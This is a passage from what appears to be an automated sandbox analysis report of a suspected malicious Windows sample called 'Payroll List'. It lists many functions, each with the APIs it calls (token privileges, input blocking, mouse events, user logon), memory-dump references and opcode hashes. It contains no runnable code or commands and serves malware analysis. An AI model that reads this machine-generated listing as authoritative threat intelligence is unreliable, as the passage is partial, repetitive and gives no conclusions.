                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                    • String ID:
                                                                    • API String ID: 81990902-0
                                                                    • Opcode ID: 77204a1f037b66264b8b04414b4546d8e24fbe95c420224c6c44cb2c3b6f22aa
                                                                    • Instruction ID: c4e9cf23aa2d1a3a01f84804d94670ac92a71d03d09928dcebf080bc042deaf6
                                                                    • Opcode Fuzzy Hash: 77204a1f037b66264b8b04414b4546d8e24fbe95c420224c6c44cb2c3b6f22aa
                                                                    • Instruction Fuzzy Hash: 0FE0BF75400510EFE7252F54FC09D777BA9EF04321B10852DB85A81870DB625C91DB50
                                                                    Function 001481AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00146DB3,-0000031A,?,?,00000001), ref: 001481B1
                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 001481BA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: 85ddec9fbe34fe53ef5405f11042e03a65b6e76c5fc72b4341415c231a1d6e50
                                                                    • Instruction ID: ba90f987785a914c0fcd37255842cb9d672046e250aeb88a7496af8148ac2227
                                                                    • Opcode Fuzzy Hash: 85ddec9fbe34fe53ef5405f11042e03a65b6e76c5fc72b4341415c231a1d6e50
                                                                    • Instruction Fuzzy Hash: A5B092B1044A08ABDF012BA1FC0AB587F68FF0A652F004010F60E44C618B7254908B92
                                                                    Function 001277B0 Relevance: 2.6, APIs: 1, Instructions: 1076COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID:
                                                                    • API String ID: 4104443479-0
                                                                    • Opcode ID: 366b89e4b17eb5d2b20d44367116cded70cd8b9b99a1a3556f9a34ff30ece7aa
                                                                    • Instruction ID: e43028a20732a9011d0c85221c587118f773a9e196748f59a93e1519bb18814d
                                                                    • Opcode Fuzzy Hash: 366b89e4b17eb5d2b20d44367116cded70cd8b9b99a1a3556f9a34ff30ece7aa
                                                                    • Instruction Fuzzy Hash: 9DA25C74D04229DFCF28CF68D4806ADBBB1FF49314F2581A9E859AB390D7349E91DB90
                                                                    Function 00133B70 Relevance: 2.2, Strings: 1, Instructions: 903COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Exception@8Throwstd::exception::exception
                                                                    • String ID: @
                                                                    • API String ID: 3728558374-2766056989
                                                                    • Opcode ID: 199624215a37a7b6bdb9ed4c91fe0a5eab41c7c95312166ee9cf45409be4c9e2
                                                                    • Instruction ID: 480291e21ea473d5caeb82de7257f5665b6cfe8df669cc6b9b59582006619cd3
                                                                    • Opcode Fuzzy Hash: 199624215a37a7b6bdb9ed4c91fe0a5eab41c7c95312166ee9cf45409be4c9e2
                                                                    • Instruction Fuzzy Hash: 0E72AC70E04208DFCF18DF94C891ABEB7B5EF58300F15806AF919AB291D735AE45CB95
                                                                    Function 0014D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2dbae76712348ec370797092af8a9351068a68384425e444f4c008c2080ff964
                                                                    • Instruction ID: 70489d940ad3e141e9c07433546aa8747da1790a88796c49b19265ec0ce2bc7f
                                                                    • Opcode Fuzzy Hash: 2dbae76712348ec370797092af8a9351068a68384425e444f4c008c2080ff964
                                                                    • Instruction Fuzzy Hash: C832E222D29F414DDB239634E862336A298AFB73D5F15D727E819B5DAAEF29C4C34100
                                                                    Function 001296C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: __itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 674341424-0
                                                                    • Opcode ID: 03c353e1cd083fdb4da858fe4407d9f9ce453e9462914e7c47d201aeec5c7247
                                                                    • Instruction ID: 6c170ebb7cfb1da3a8f5ef84299e802cb989a495a244331e768ac3abd7288848
                                                                    • Opcode Fuzzy Hash: 03c353e1cd083fdb4da858fe4407d9f9ce453e9462914e7c47d201aeec5c7247
                                                                    • Instruction Fuzzy Hash: 3922DC716083209FDB28DF28D890B6FB7E4BF94314F11492DF89A97291DB71E954CB82
                                                                    Function 0015038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c0d344ddd4cfb044be6a1afeeddc5058c7817067eaef165102da413df2594fda
                                                                    • Instruction ID: 0e1553da9fcd536aa3bd303a8c28ff1f1458f3158c174897183515d064809c18
                                                                    • Opcode Fuzzy Hash: c0d344ddd4cfb044be6a1afeeddc5058c7817067eaef165102da413df2594fda
                                                                    • Instruction Fuzzy Hash: 3FB1D020D2AF414DD723AA398871336B65DAFBB2D5F91D71BFC2A74D62EB2185C34180
                                                                    Function 0016B6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __time64.LIBCMT ref: 0016B6DF
                                                                      • Part of subcall function 0014344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0016BDC3,00000000,?,?,?,?,0016BF70,00000000,?), ref: 00143453
                                                                      • Part of subcall function 0014344A: __aulldiv.LIBCMT ref: 00143473
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                                    • String ID:
                                                                    • API String ID: 2893107130-0
                                                                    • Opcode ID: 3b19a41037f5127eba8c65a8ed32daeae6e1271f17baef386549838e5c955247
                                                                    • Instruction ID: 885f505b2f600f59dcd1049ffe5114be7c6a85a54d0c026cfa7bd7d9df8535ec
                                                                    • Opcode Fuzzy Hash: 3b19a41037f5127eba8c65a8ed32daeae6e1271f17baef386549838e5c955247
                                                                    • Instruction Fuzzy Hash: 0A219D726345108BC729CF28C881A96B7E1EB95320B248E6DE0E5CF2C0CB74AA55CB54
                                                                    Function 00176AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • BlockInput.USER32(00000001), ref: 00176ACA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: BlockInput
                                                                    • String ID:
                                                                    • API String ID: 3456056419-0
                                                                    • Opcode ID: f1e595480511326eedb722b11f69657f6bd99b04d98d475fd7ea3cc041fad67b
                                                                    • Instruction ID: 4eaf4c21d6eca673b5c7d9ee8badda7456e84947e0c7e7d6ffccfd442f96caa4
                                                                    • Opcode Fuzzy Hash: f1e595480511326eedb722b11f69657f6bd99b04d98d475fd7ea3cc041fad67b
                                                                    • Instruction Fuzzy Hash: FDE04835200214AFC700EF59E405D56B7ECAF75751F04C416F949D7651DBB0F8448BA0
                                                                    Function 001674BB Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 001674DE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: mouse_event
                                                                    • String ID:
                                                                    • API String ID: 2434400541-0
                                                                    • Opcode ID: 1529d87bb0852ec187ee537ebf4d2dc9163bda999a6af1a8a040899e2d0391a8
                                                                    • Instruction ID: edcd76b336bfc6b2aee6166eb72c2f42b3b704e3775bd7cf3c801eb5c8078ed8
                                                                    • Opcode Fuzzy Hash: 1529d87bb0852ec187ee537ebf4d2dc9163bda999a6af1a8a040899e2d0391a8
                                                                    • Instruction Fuzzy Hash: AAD05EA252C70538EC2D07249C0FF7A1948F3007C8F808289B082C94C1FE805861A132
                                                                    Function 0015B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0015AD3E), ref: 0015B124
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: LogonUser
                                                                    • String ID:
                                                                    • API String ID: 1244722697-0
                                                                    • Opcode ID: 8e30315c77b08f28d1849988b280856fcfbfd241fc14cf5e5927692be653a644
                                                                    • Instruction ID: b70fbac0f4efd4d6ff465de3aad80f5b218f6680702500e393c646e692ae43c6
                                                                    • Opcode Fuzzy Hash: 8e30315c77b08f28d1849988b280856fcfbfd241fc14cf5e5927692be653a644
                                                                    • Instruction Fuzzy Hash: B2D05E320A4A0EAEDF024FA4EC02EAE3F6AEB04700F408110FA12C54A0C671D531AB50
                                                                    Function 0019B340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: NameUser
                                                                    • String ID:
                                                                    • API String ID: 2645101109-0
                                                                    • Opcode ID: aebff4ecce54331aea96becd9c6cbbd614bfaaffc6f6fe0538cd0b485890f1ca
                                                                    • Instruction ID: cdf38f89517009bc1e8b6577a8ed2341acb14fa86f263cc31cd6b5472509f539
                                                                    • Opcode Fuzzy Hash: aebff4ecce54331aea96becd9c6cbbd614bfaaffc6f6fe0538cd0b485890f1ca
                                                                    • Instruction Fuzzy Hash: 31C04CB1800509DFCB55CBD0DA449EEB7BCAB04301F114091B106F1510D7709B859B72
                                                                    Function 00148189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0014818F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: 2d5b94417520c460b4885febc2fe1d54b449f00bc8638b4097a78779877b5e25
                                                                    • Instruction ID: 1c49bb9f5b65ff2a29ee490b7485ddb5f5dc63ffc1c8b926c482b6fe6e0d7372
                                                                    • Opcode Fuzzy Hash: 2d5b94417520c460b4885febc2fe1d54b449f00bc8638b4097a78779877b5e25
                                                                    • Instruction Fuzzy Hash: F4A0113000020CAB8F022B82FC0A8883F2CFB022A0B000020F80E008208B22A8A08A82
                                                                    Function 00133200 Relevance: 1.0, Instructions: 986COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpper
                                                                    • String ID:
                                                                    • API String ID: 3964851224-0
                                                                    • Opcode ID: 2c4047e925cccad1a6afa8c43853b682799f8928ba42edf59b645abe0c32a70f
                                                                    • Instruction ID: cca6e0e7764e4293a5d749cff326c797dafd71e12d220892f579f34b73767e2a
                                                                    • Opcode Fuzzy Hash: 2c4047e925cccad1a6afa8c43853b682799f8928ba42edf59b645abe0c32a70f
                                                                    • Instruction Fuzzy Hash: 30927970608341DFDB24DF18C484B6ABBE1BF98304F14885DF89A8B2A2D775ED45CB96
                                                                    Function 0012E3B0 Relevance: .5, Instructions: 540COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7325bd7b3da8be50952ba72e7a9ec78f373d8375e23ff0e8e6f2a885c28f1e8b
                                                                    • Instruction ID: 9b8aa6eb52a57f988e49c558b768846e6abd0cc4d5fc69fa4f0571db8e4377e2
                                                                    • Opcode Fuzzy Hash: 7325bd7b3da8be50952ba72e7a9ec78f373d8375e23ff0e8e6f2a885c28f1e8b
                                                                    • Instruction Fuzzy Hash: DD22AF74904225CFDB28DF54E490ABEB7F0FF18304F148069E98A9B391E735AD91CB91
                                                                    Function 001293F0 Relevance: .5, Instructions: 531COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9063e955199ad77b901c6e30d4d1aa0de5aa18e38d45297f5f65fb321d55cf74
                                                                    • Instruction ID: 7278644237d4586ed8eef15f4403a01a401d213876c24ed8004198aab8edfb09
                                                                    • Opcode Fuzzy Hash: 9063e955199ad77b901c6e30d4d1aa0de5aa18e38d45297f5f65fb321d55cf74
                                                                    • Instruction Fuzzy Hash: CD128070A00219EFDF14DFA9E991AEEB7F5FF58300F104529E806E7694EB35A921CB50
                                                                    Function 0012AF50 Relevance: .5, Instructions: 514COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Exception@8Throwstd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 3728558374-0
                                                                    • Opcode ID: 5f520b932f9682330844e44dfa6430eaf28331a083730274fb934d6d3084e217
                                                                    • Instruction ID: 41da350a75b6d67eec5d425cf4d4e21d0b60c62345d553f29c03f83882f1d96e
                                                                    • Opcode Fuzzy Hash: 5f520b932f9682330844e44dfa6430eaf28331a083730274fb934d6d3084e217
                                                                    • Instruction Fuzzy Hash: E302A270A00215EFCF18DF68E991AAEBBF5FF54300F118069E806DB295EB35D925CB91
                                                                    Function 001402A4 Relevance: .3, Instructions: 345COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                    • Instruction ID: 632a47e902c164b2d3828a8f69de95d3ee200fb4db0ebc26e299100b67bee37c
                                                                    • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                    • Instruction Fuzzy Hash: 7CC183322051A30ADF2E463A847443EBAA15BA27B171B077DD8B3CF5E5EF30C525E620
                                                                    Function 001406D9 Relevance: .3, Instructions: 341COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                    • Instruction ID: b16d1da60fb5133527c29a43de352730dbc79088fa4ecccb0fa2e6c2c3b63447
                                                                    • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
